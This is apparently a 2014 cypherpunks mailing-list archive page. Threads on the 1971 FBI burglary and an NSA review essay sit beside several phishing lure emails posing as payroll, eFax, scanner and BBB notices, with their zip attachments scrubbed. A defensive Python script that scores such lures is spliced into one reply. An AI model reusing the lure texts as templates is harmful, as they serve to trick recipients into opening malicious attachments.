From payroll at intuit.com Tue Apr 1 01:23:35 2014
From: payroll at intuit.com (Payroll Invoice)
Date: 1 Apr 2014 08:23:35 GMT
Subject: Payment Overdue - Please respond
Message-ID:

Please find attached payroll reports for the past months. Remit the new payment by 04/08/2014 as outlined under our payment agreement.

Sincerely,
Lon Tate

This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.

CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Payroll.zip
Type: application/zip
Size: 8950 bytes
Desc: not available
URL:

From message at inbound.efax.com Tue Apr 1 08:06:12 2014
From: message at inbound.efax.com (eFax Corporate)
Date: Tue, 1 Apr 2014 10:06:12 -0500
Subject: Corporate eFax message from "374-795-8364" - 5 pages
Message-ID: <_001_latf1_did11-1663375535-3362337038-21123206627717297media3la_@media1.latf1.colo.j2noc.com>

Fax Message [Caller-ID: 374-795-8364]

You have received a 5 pages fax at 2014-01-04 05:55:55 CST.*

The reference number for this fax is latf1_did11-1663375535-3362337038-21.

View this fax using your PDF reader.

Please visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service.

Thank you for using the eFax service!

Home | Contact | Login | 2013 j2 Global Communications, Inc. All rights reserved.
eFax is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax Customer Agreement.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: multipart/related
Size: 3 bytes
Desc: not available
URL:

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1862 bytes
Desc: not available
URL:

-------------- next part --------------
A non-text attachment was scrubbed...
Name: FAX_6291741_7941724.zip
Type: application/zip
Size: 8541 bytes
Desc: not available
URL:

From scan.475 at jfet.org Tue Apr 1 07:29:37 2014
From: scan.475 at jfet.org (Local Scan)
Date: 1 Apr 2014 14:29:37 GMT
Subject: Scanned Image from a Xerox WorkCentre
Message-ID: <53FIU8Y4U77HG798JWYBSEGVZFJLDHL4L4EVRX@jfet.org>

Please open the attached document.

Sent by: jfet.org
Number of Images: 6
Attachment File Type: ZIP [PDF]

WorkCentre Pro Location: Machine location not set
Device Name: jfet.org

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Scan_Local_0401GMT.zip
Type: application/zip
Size: 8962 bytes
Desc: not available
URL:

From message at inbound.j2.com Tue Apr 1 08:16:17 2014
From: message at inbound.j2.com (jConnect)
Date: Tue, 1 Apr 2014 15:16:17 +0000
Subject: Corporate eFax message from "434-487-3633" - 5 pages
Message-ID: <_002_latf1_did11-1114045711-5646235876-15485081891672901media1la_@media4.lax3.colo.j2noc.com>

Fax Message [Caller-ID: 434-487-3633]

You have received a 5 pages fax at 2014-01-04 05:55:55 CST.*

The reference number for this fax is latf1_did11-1114045711-5646235876-15.

Download attachment with the fax using your PDF reader.

Please visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service.

Thank you for using the eFax service!

Home | Contact | Login | 2014 j2 Global Communications, Inc. All rights reserved.
eFax is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax Customer Agreement.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: multipart/related
Size: 3 bytes
Desc: not available
URL:

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1881 bytes
Desc: not available
URL:

-------------- next part --------------
A non-text attachment was scrubbed...
Name: FAX_6291741_7941724.zip
Type: application/zip
Size: 8541 bytes
Desc: not available
URL:

From jamesdbell9 at yahoo.com Tue Apr 1 20:02:09 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Tue, 1 Apr 2014 20:02:09 -0700 (PDT)
Subject: Investigating the Investigators
Message-ID: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com>

Group of people who burgled the FBI in 1971
https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reveal-themselves-in--1971-205728154.html?vp=1

On March 8, 1971, a group of anti-war activists broke into an FBI office in Media, Pennsylvania, and changed the course of history.

The burglars wound up blowing the whistle on illegal surveillance and bullying tactics employed by J. Edgar Hoover and his government agency — and despite one of the biggest FBI dragnets ever, the perpetrators were never caught and their identities remained secret… until now.

The new documentary "1971" reveals these former political radicals as they tell their story on film for the first time. At the time of the break-in, anti-war activists believed they were being watched by the FBI. Bonnie and John Raines, a married couple with three children, had participated in rallies and were photographed by suspected government agents. That prompted them to join the group, which eventually swiped more than 1,000 documents.

Billing themselves as 'The Citizens Commission to Investigate the FBI,' the members took serious risks to deliver the stolen FBI documents to the press. "We knew that if we got caught, we were going to face very serious prison time," says John Raines in the film (as seen in the trailer). "If the FBI was suppressing dissent, it was as important to expose that as it was to end the war," says journalist Betty Medsger, who is responsible for exposing the burglars' identities. She wrote the new book "The Burglary" and worked closely with "1971" filmmakers.

"Break into an FBI office, remove files, and mail them to newspapers," says Bonnie Raines of the plan. It was not haphazard. They cased the FBI building in Media for weeks, tracking comings and goings and drawing up detailed maps and a plan.

Multiple setbacks nearly halted the operation. "A couple of weeks before the break-in date, one person in the group dropped out — simply walked away. This person knew every detail of their plans. The risk that he would expose them was huge. They went ahead anyway," says "1971" director and producer Johanna Hamilton. "The break-in itself almost didn't happen. When the chief lock-picker arrived, he found the lock on the FBI's door was different than the one he had been practicing for. So the whole process was much more complicated and tenuous than they originally thought," she tells Yahoo Movies.

Once the documents were taken, the group spent days scanning them to find evidence of FBI wrongdoing, according to a recent New York Times report. They sent copies of the most revealing documents to journalists, one of whom was Medsger of the Washington Post. She was one of few journalists who acted on the information.

The biggest discovery was finding that Hoover ran a covert operation with the code name COINTELPRO, under which the FBI would survey, infiltrate, discredit, and disrupt political groups and U.S. citizens deemed "subversive." Much of the activity was illegal.

The burglary which exposed COINTELPRO led to the first-ever congressional investigation of U.S. intelligence agencies, and as a result the operation was terminated. The documents revealed that a wide array of postal workers, police, and even switchboard operators were used as FBI informants. Martin Luther King Jr. was a major target of COINTELPRO, with agents having him under surveillance and repeatedly bugging his home and hotel rooms.

"What is consistently amazing to me is the fact that only one of the documents they stole contained the caption COINTELPRO.
It was that one document that would lead to the full revelation of FBI dirty tricks," says Hamilton.

Another stunning revelation: Hoover's program had been running since 1956. "By 1971 so many people and groups had been put under surveillance," says Hamilton. "Basically there was blanket surveillance of African Americans — both well known, like the Black Panthers, and less known, everyday people, students, people who were active in communal African-American life."

"1971" debuts at the Tribeca Film Festival in New York on April 18.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 7292 bytes
Desc: not available
URL:

From shelley at misanthropia.info Tue Apr 1 21:39:00 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Tue, 01 Apr 2014 21:39:00 -0700
Subject: Investigating the Investigators
Message-ID: <1396413540.19427.101719853.680E5575@webmail.messagingengine.com>

On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote:
> Group of people who burgled the FBI in 1971
> https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reveal-themselves-in--1971-205728154.html?vp=1

Thanks for posting this. It's so timely and historically important. Can't wait to see it.

Hey Jim, what happened with the Yahoo account you were locked out of? Did you ever get the lost emails and contacts restored?

-Shelley

> On March 8, 1971, a group of anti-war activists broke into an FBI office
> in Media, Pennsylvania, and changed the course of history.
> The burglars wound up blowing the whistle on illegal surveillance and
> bullying tactics employed by J. Edgar Hoover and his government agency —
> and despite one of the biggest FBI dragnets ever, the perpetrators were
> never caught and their identities remained secret… until now.
> The new documentary "1971" reveals these former political radicals as
> they tell their story on film for the first time. At the time of the
> break-in, anti-war activists believed they were being watched by the FBI.
> Bonnie and John Raines, a married couple with three children, had
> participated in rallies and were photographed by suspected government
> agents. That prompted them to join the group, which eventually swiped
> more than 1,000 documents.
> Billing themselves as 'The Citizens Commission to Investigate the FBI,'
> the members took serious risks to deliver the stolen FBI documents to the
> press. "We knew that if we got caught, we were going to face very serious
> prison time," says John Raines in the film (as seen in the trailer). "If
> the FBI was suppressing dissent, it was as important to expose that as it
> was to end the war," says journalist Betty Medsger, who is responsible
> for exposing the burglars' identities. She wrote the new book "The
> Burglary" and worked closely with "1971" filmmakers.
> "Break into an FBI office, remove files, and mail them to newspapers,"
> says Bonnie Raines of the plan. It was not haphazard. They cased the FBI
> building in Media for weeks, tracking comings and goings and drawing up
> detailed maps and a plan.
> Multiple setbacks nearly halted the operation. "A couple of weeks before
> the break-in date, one person in the group dropped out — simply walked
> away. This person knew every detail of their plans. The risk that he
> would expose them was huge. They went ahead anyway," says "1971" director
> and producer Johanna Hamilton. "The break-in itself almost didn't happen.
> When the chief lock-picker arrived, he found the lock on the FBI's door
> was different than the one he had been practicing for. So the whole
> process was much more complicated and tenuous than they originally
> thought," she tells Yahoo Movies.
> Once the documents were taken, the group spent days scanning them to find
> evidence of FBI wrongdoing, according to a recent New York Times report.
> They sent copies of the most revealing documents to journalists, one of
> whom was Medsger of the Washington Post. She was one of few journalists
> who acted on the information.
> The biggest discovery was finding that Hoover ran a covert operation with
> the code name COINTELPRO, under which the FBI would survey, infiltrate,
> discredit, and disrupt political groups and U.S. citizens deemed
> "subversive." Much of the activity was illegal.
>
> The burglary which exposed COINTELPRO led to the first-ever congressional
> investigation of U.S. intelligence agencies, and as a result the
> operation was terminated. The documents revealed that a wide array of
> postal workers, police, and even switchboard operators were used as FBI
> informants. Martin Luther King Jr. was a major target of COINTELPRO, with
> agents having him under surveillance and repeatedly bugging his home and
> hotel rooms.
> "What is consistently amazing to me is the fact that only one of the
> documents they stole contained the caption COINTELPRO. It was that one
> document that would lead to the full revelation of FBI dirty tricks,"
> says Hamilton.
> Another stunning revelation: Hoover's program had been running since
> 1956. "By 1971 so many people and groups had been put under
> surveillance," says Hamilton. "Basically there was blanket surveillance
> of African Americans — both well known, like the Black Panthers, and less
> known, everyday people, students, people who were active in communal
> African-American life."
> "1971" debuts at the Tribeca Film Festival in New York on April 18.
From jamesdbell9 at yahoo.com Tue Apr 1 22:16:38 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Tue, 1 Apr 2014 22:16:38 -0700 (PDT)
Subject: Investigating the Investigators
In-Reply-To: <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com>
References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com>
Message-ID: <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com>

On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote:
> Group of people who burgled the FBI in 1971
> https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reveal-themselves-in--1971-205728154.html?vp=1

> Thanks for posting this. It's so timely and historically important.
> Can't wait to see it.

> Hey Jim, what happened with the Yahoo account you were locked out of?
> Did you ever get the lost emails and contacts restored?

> -Shelley

Haven't got back on jamesdbell8 at yahoo.com. I'm convinced that Yahoo is a bunch of crooks. Bleeding-heart, do-gooder liberal crooks. Anybody who looks at Yahoo's news sees this.

Jim Bell

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1652 bytes
Desc: not available
URL:

From Brian.Winn at newyork.bbb.org Tue Apr 1 20:24:31 2014
From: Brian.Winn at newyork.bbb.org (Better Business Bureau)
Date: 2 Apr 2014 03:24:31 GMT
Subject: FW: Case X4710H1S947MFC5
Message-ID: <24240.4030506@newyork.bbb.org>

The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer's concern are included on the reverse. Please review this matter and advise us of your position. As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct.

In the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by September 13, 2013. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.

The Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada. This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.

We encourage you to print this complaint (attached file - Case_X4710H1S947MFC5), answer the questions and respond to us.

We look forward to your prompt attention to this matter.

Sincerely,
Brian.Winn
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Case_X4710H1S947MFC5.zip
Type: application/zip
Size: 7962 bytes
Desc: not available
URL:

From HP_Printer at jfet.org Wed Apr 2 07:27:33 2014
From: HP_Printer at jfet.org (HP Digital Device)
Date: 2 Apr 2014 14:27:33 GMT
Subject: Scanned Image from a HP Digital Device
Message-ID: <799945845880.s2Q2RM2o026120@ga.adp.com>

Please open the attached document. This document was digitally sent to you using an HP Digital Sending device.

-------------------------------------------------------------------------------
This email has been scanned for viruses and spam.
-------------------------------------------------------------------------------

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Image_001_040214.zip
Type: application/zip
Size: 8099 bytes
Desc: not available
URL:

From beam at rayservers.net Wed Apr 2 09:42:17 2014
From: beam at rayservers.net (beam)
Date: Wed, 02 Apr 2014 18:42:17 +0200
Subject: Google can grow up to not be evil
Message-ID: <533C3DE9.5090308@rayservers.net>

"By working together with those that harvest value from nature, Google can quickly create a truly non-evil system for all.

We suggest that the “there is one way and that way is secure, economically-viable-and-self-extending, anonymous and untraceable” is the policy to adopt, in that order.

We are happy to amplify this."

Source: http://courtofrecord.co.uk/US/US-Google-cover/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 261 bytes
Desc: OpenPGP digital signature
URL:

From adam at cypherspace.org Wed Apr 2 20:29:47 2014
From: adam at cypherspace.org (Adam Back)
Date: Wed, 2 Apr 2014 20:29:47 -0700
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net>
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID:

That review does not really jive with the complaints from the people on the intelligence oversight committee, the NSA leaders who explicitly lied to congress, the complaint from the author of the patriot act that he thought the NSA was breaking the law, and the subsequently released complaints from the FISA court about illegal and non-credible abusive interpretations of the law and the FISA courts instructions. Also there were several reports saying nothing of consequence was prevented by the entire program.

If you know him, maybe you want to ask him how he reconciles all these now matter-of-public-record conflicts with what he just said.

Of course he did leave wiggle room in the form of "[not] so clearly unlawful that it would have been appropriate for the NSA to refuse to fulfill its responsibilities." I.e. it was only somewhat illegal, so hey, that's ok then?

Have to say it seems more plausible to me that they did a faux-forthright job of answering questions from this new review process. I mean what else could they do? Stonewall?

Adam

On 2 April 2014 19:56, wrote:
>
> [ disclaimer, Geoff Stone is a friend of mine ]
>
>
>
> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology
>
> What I Told the NSA
>
> Because of my service on the President's Review Group last fall,
> which made recommendations to the president about NSA surveillance
> and related issues, the NSA invited me to speak today to the NSA
> staff at the NSA headquarters in Fort Meade, Maryland, about my
> work on the Review Group and my perceptions of the NSA. Here,
> in brief, is what I told them:
>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2339 bytes
Desc: not available
URL:

From shelley at misanthropia.info Wed Apr 2 21:36:41 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Wed, 02 Apr 2014 21:36:41 -0700
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <1396496398.9121.102160329.353BA3A5@webmail.messagingengine.com>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <1396496398.9121.102160329.353BA3A5@webmail.messagingengine.com>
Message-ID: <1396499801.8276.102171125.334FBBF4@webmail.messagingengine.com>

On Wed, Apr 2, 2014, at 08:39 PM, Alfie John wrote:
> You can probably stop with the NSA apologists propaganda, April Fools
> was yesterday.

Ha! That was my first thought, too. My second thought was, "I wonder what the spooks have on this guy?" It sounds like it was written under duress, like the fake "confessions" they make POWs give.
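The five "Payroll", "eFax", "Scanned Image" and "BBB Case" messages earlier on this page share a shape a mail admin can score mechanically: a zip attachment of 8-9 KB, a subject that promises a scan, fax, invoice or complaint, a Date header written without the weekday, and in two cases a From address at one domain with a Message-ID minted at another (HP_Printer at jfet.org, Message-ID at ga.adp.com; eFax Corporate at inbound.efax.com, Message-ID at j2noc.com). The script below is an added example, not list software or anything posted by the list members; it parses pipermail-style message blocks and their "attachment was scrubbed" notices and assigns a triage score. SAMPLE is constructed from the envelope lines, headers and attachment notices visible above (bodies and the Desc/URL lines omitted); the cut-offs SMALL_ZIP and THRESHOLD and the lure word list are my assumptions, not figures from the page, and the score is a reason to pull the attachment for a look, not a verdict on any message.

```python
"""Triage heuristic for zip-attachment lure messages in a pipermail archive.

Added example, not code from the list or any project on this page. SAMPLE is
constructed from the envelope lines, headers and "attachment was scrubbed"
notices visible on the page (Desc/URL lines dropped, bodies omitted); the
cut-offs SMALL_ZIP and THRESHOLD and the LURE word list are assumptions.
"""
import re

SAMPLE = """\
From payroll at intuit.com Tue Apr 1 01:23:35 2014
From: payroll at intuit.com (Payroll Invoice)
Date: 1 Apr 2014 08:23:35 GMT
Subject: Payment Overdue - Please respond
Message-ID:

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Payroll.zip
Type: application/zip
Size: 8950 bytes
From message at inbound.efax.com Tue Apr 1 08:06:12 2014
From: message at inbound.efax.com (eFax Corporate)
Date: Tue, 1 Apr 2014 10:06:12 -0500
Subject: Corporate eFax message from "374-795-8364" - 5 pages
Message-ID: <_001_latf1_did11-1663375535-3362337038-21123206627717297media3la_@media1.latf1.colo.j2noc.com>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: FAX_6291741_7941724.zip
Type: application/zip
Size: 8541 bytes
From HP_Printer at jfet.org Wed Apr 2 07:27:33 2014
From: HP_Printer at jfet.org (HP Digital Device)
Date: 2 Apr 2014 14:27:33 GMT
Subject: Scanned Image from a HP Digital Device
Message-ID: <799945845880.s2Q2RM2o026120@ga.adp.com>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Image_001_040214.zip
Type: application/zip
Size: 8099 bytes
From jamesdbell9 at yahoo.com Tue Apr 1 20:02:09 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Tue, 1 Apr 2014 20:02:09 -0700 (PDT)
Subject: Investigating the Investigators
Message-ID: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 7292 bytes
"""

ENVELOPE = re.compile(r"(?m)^(?=From \S+ at \S+ )")  # pipermail "From x at y <date>" line
HEADER = re.compile(r"^([A-Za-z-]+): ?(.*)$")
ATTACHMENT = re.compile(r"^Name: (.*)\nType: (.*)\nSize: (\d+) bytes", re.M)
LURE = re.compile(r"scan|fax|payroll|invoice|overdue|\bcase\b|complaint", re.I)
WEEKDAY = re.compile(r"^(Mon|Tue|Wed|Thu|Fri|Sat|Sun),")
SMALL_ZIP = 16 * 1024  # assumed cut-off; the lures on the page are all 8-9 KB zips
THRESHOLD = 4          # assumed: flag for review at this score or above


def parse_message(block):
    """Return (headers, attachments) for one pipermail message block."""
    headers = {}
    for line in block.splitlines()[1:]:  # line 0 is the envelope line
        m = HEADER.match(line)
        if not m:
            break  # first non-header line (blank or body) ends the header block
        headers[m.group(1).lower()] = m.group(2).strip()
    attachments = [(n, t, int(s)) for n, t, s in ATTACHMENT.findall(block)]
    return headers, attachments


def base_domain(host):
    """Crude registrable-domain approximation: last two labels."""
    return ".".join(host.lower().strip(".").split(".")[-2:])


def score_message(headers, attachments):
    """Weighted signals; returns (total, [reason, ...])."""
    reasons = []
    if any(t == "application/zip" and s <= SMALL_ZIP for _, t, s in attachments):
        reasons.append(("small zip attachment", 3))
    if LURE.search(headers.get("subject", "")):
        reasons.append(("scanner/fax/invoice lure subject", 1))
    sender = re.search(r"\S+ at (\S+)", headers.get("from", ""))
    msgid = re.search(r"@([^>\s]+)", headers.get("message-id", ""))
    if sender and msgid and base_domain(sender.group(1)) != base_domain(msgid.group(1)):
        reasons.append(("From domain differs from Message-ID domain", 1))
    date = headers.get("date", "")
    if date and not WEEKDAY.match(date):
        reasons.append(("Date header omits the weekday", 1))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def triage(archive):
    """Map each From header to (score, reasons, flagged) in archive order."""
    results = {}
    for block in ENVELOPE.split(archive):
        if not block.strip():
            continue
        headers, attachments = parse_message(block)
        total, reasons = score_message(headers, attachments)
        results[headers.get("from", "?")] = (total, reasons, total >= THRESHOLD)
    return results


if __name__ == "__main__":
    for sender, (total, reasons, flagged) in triage(SAMPLE).items():
        print("REVIEW" if flagged else "ok    ", total, sender, "; ".join(reasons))
```

The weekday signal is deliberately weak (RFC 5322 makes the day-of-week optional), which is why it is worth one point while a sub-16 KB zip is worth three; the jim bell message with a 7 KB text/html part scores zero and is the control. Run over a real archive, the From/Message-ID mismatch will also fire on legitimate outsourced mailers, so treat the score as a queue order for pulling the zip into a sandbox, not as a block list.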
From tpb-crypto at laposte.net Wed Apr 2 12:59:01 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Wed, 02 Apr 2014 21:59:01 +0200
Subject: Google can grow up to not be evil
In-Reply-To: <533C3DE9.5090308@rayservers.net>
References: <533C3DE9.5090308@rayservers.net>
Message-ID: <1018994096.42779.1396468699217.JavaMail.www@wwinf8226>

> Message from 02/04/14 19:13
> From: "beam"
> To: cypherpunks at al-qaeda.net, cypherpunks at cpunks.org, "cryptopolitics"
> Cc:
> Subject: Google can grow up to not be evil
>
> "By working together with those that harvest value from nature, Google
> can quickly create a truly non-evil system for all.
>
> We suggest that the “there is one way and that way is secure,
> economically-viable-and-self-extending, anonymous and untraceable” is
> the policy to adopt, in that order.
>
> We are happy to amplify this."
>
> Source: http://courtofrecord.co.uk/US/US-Google-cover/
>
>
>
>
> [ signature.asc (0.3 KB) ]

"We suggest that Google engineers embrace and adopt the lisp programming language to create a brand new open source operating system with a lisp kernel."

I lost.

From dan at geer.org Wed Apr 2 19:56:16 2014
From: dan at geer.org (dan at geer.org)
Date: Wed, 02 Apr 2014 22:56:16 -0400
Subject: Geoff Stone, Obama's Review Group
Message-ID: <20140403025616.D514A2280D8@palinka.tinho.net>

[ disclaimer, Geoff Stone is a friend of mine ]

www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology

What I Told the NSA

Because of my service on the President's Review Group last fall, which made recommendations to the president about NSA surveillance and related issues, the NSA invited me to speak today to the NSA staff at the NSA headquarters in Fort Meade, Maryland, about my work on the Review Group and my perceptions of the NSA. Here, in brief, is what I told them:

From the outset, I approached my responsibilities as a member of the Review Group with great skepticism about the NSA. I am a long-time civil libertarian, a member of the National Advisory Council of the ACLU, and a former Chair of the Board of the American Constitution Society. To say I was skeptical about the NSA is, in truth, an understatement.

I came away from my work on the Review Group with a view of the NSA that I found quite surprising. Not only did I find that the NSA had helped to thwart numerous terrorist plots against the United States and its allies in the years since 9/11, but I also found that it is an organization that operates with a high degree of integrity and a deep commitment to the rule of law.

Like any organization dealing with extremely complex issues, the NSA on occasion made mistakes in the implementation of its authorities, but it invariably reported those mistakes upon discovering them and worked conscientiously to correct its errors. The Review Group found no evidence that the NSA had knowingly or intentionally engaged in unlawful or unauthorized activity. To the contrary, it has put in place carefully-crafted internal procedures to ensure that it operates within the bounds of its lawful authority.

This is not to say that the NSA should have had all of the authorities it was given. The Review Group found that many of the programs undertaken by the NSA were highly problematic and much in need of reform. But the responsibility for directing the NSA to carry out those programs rests not with the NSA, but with the Executive Branch, the Congress, and the Foreign Intelligence Surveillance Court, which authorized those programs -- sometimes without sufficient attention to the dangers they posed to privacy and civil liberties. The NSA did its job -- it implemented the authorities it was given.

It gradually became apparent to me that in the months after Edward Snowden began releasing information about the government's foreign intelligence surveillance activities, the NSA was being severely -- and unfairly -- demonized by its critics. Rather than being a rogue agency that was running amok in disregard of the Constitution and laws of the United States, the NSA was doing its job. It pained me to realize that the hard-working, dedicated, patriotic employees of the NSA, who were often working for far less pay than they could have earned in the private sector because they were determined to help protect their nation from attack, were being castigated in the press for the serious mistakes made, not by them, but by Presidents, the Congress, and the courts.

Of course, "I was only following orders" is not always an excuse. But in no instance was the NSA implementing a program that was so clearly illegal or unconstitutional that it would have been justified in refusing to perform the functions assigned to it by Congress, the President, and the Judiciary. Although the Review Group found that many of those programs need serious re-examination and reform, none of them was so clearly unlawful that it would have been appropriate for the NSA to refuse to fulfill its responsibilities.

Moreover, to the NSA's credit, it was always willing to engage the Review Group in serious and candid discussions about the merits of its programs, their deficiencies, and the ways in which those programs could be improved. Unlike some other entities in the intelligence community and in Congress, the leaders of the NSA were not reflexively defensive, but were forthright, engaged, and open to often sharp questions about the nature and implementation of its programs.

To be clear, I am not saying that citizens should trust the NSA. They should not. Distrust is essential to effective democratic governance. The NSA should be subject to constant and rigorous review, oversight, scrutiny, and checks and balances. The work it does, however important to the safety of the nation, necessarily poses grave dangers to fundamental American values, particularly if its work is abused by persons in positions of authority. If anything, oversight of the NSA -- especially by Congress -- should be strengthened. The future of our nation depends not only on the NSA doing its job, but also on the existence of clear, definitive, and carefully enforced rules and restrictions governing its activities.

In short, I found, to my surprise, that the NSA deserves the respect and appreciation of the American people. But it should never, ever, be trusted.

From dal at riseup.net Wed Apr 2 21:56:50 2014
From: dal at riseup.net (Douglas Lucas)
Date: Wed, 02 Apr 2014 23:56:50 -0500
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net>
References: <20140403025616.D514A2280D8@palinka.tinho.net>
Message-ID: <533CEA12.4020904@riseup.net>

From the looks of this speech, the NSA must have blackmailed him.

On 04/02/2014 09:56 PM, dan at geer.org wrote:
> [ disclaimer, Geoff Stone is a friend of mine ]
>
>
> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology
>
> What I Told the NSA
>
> Because of my service on the President's Review Group last fall,
> which made recommendations to the president about NSA surveillance
> and related issues, the NSA invited me to speak today to the NSA
> staff at the NSA headquarters in Fort Meade, Maryland, about my
> work on the Review Group and my perceptions of the NSA. Here,
> in brief, is what I told them:
>
> From the outset, I approached my responsibilities as a member
> of the Review Group with great skepticism about the NSA.
I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. > > Like any organization dealing with extremely complex issues, > the NSA on occasion made mistakes in the implementation of its > authorities, but it invariably reported those mistakes upon > discovering them and worked conscientiously to correct its > errors. The Review Group found no evidence that the NSA had > knowingly or intentionally engaged in unlawful or unauthorized > activity. To the contrary, it has put in place carefully-crafted > internal proceduresto ensure that it operates within the bounds > of its lawful authority. > > This is not to say that the NSA should have had all of the > authorities it was given. The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs > -- sometimes without sufficient attention to the dangers they > posed to privacy and civil liberties. The NSA did its job -- > it implemented the authorities it was given. 
> > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. Rather > than being a rogue agency that was running amok in disregard > of the Constitution and laws of the United States, the NSA was > doing its job. It pained me to realize that the hard-working, > dedicated, patriotic employees of the NSA, who were often > working for far less pay than they could have earned in the > private sector because they were determined to help protect > their nation from attack, were being castigated in the press > for the serious mistakes made, not by them, but by Presidents, > the Congress, and the courts. > > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. > > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. > > To be clear, I am not saying that citizens should trust the > NSA. They should not. Distrust is essential to effective > democratic governance. 
